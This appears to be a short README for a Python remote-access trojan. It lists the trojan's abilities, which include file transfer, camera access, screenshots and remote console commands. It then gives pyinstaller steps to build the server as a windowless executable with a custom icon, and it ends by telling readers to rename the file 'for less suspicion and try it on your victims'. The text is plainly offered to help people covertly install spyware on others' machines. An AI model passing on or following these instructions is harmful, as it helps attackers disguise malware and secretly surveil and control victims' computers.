Simple trojan that has such functions like file transfering, camera access, screenshoting, it aslo supports console commands How to use:
- Open terminal in folder with remote-access-trojan files
- If you don't have pyinstaller, install it by running command 'pip install pyinstaller'
- Next step, run 'pyinstaller --noconsole --onefile server.py'
- After process completion you can find RAT in dist folder
- You can also set icon for your RAT by running something like 'pyinstaller --noconsole --onefile --icon=app.ico server.py'
- Rename .exe file for less suspicion and try it on your victims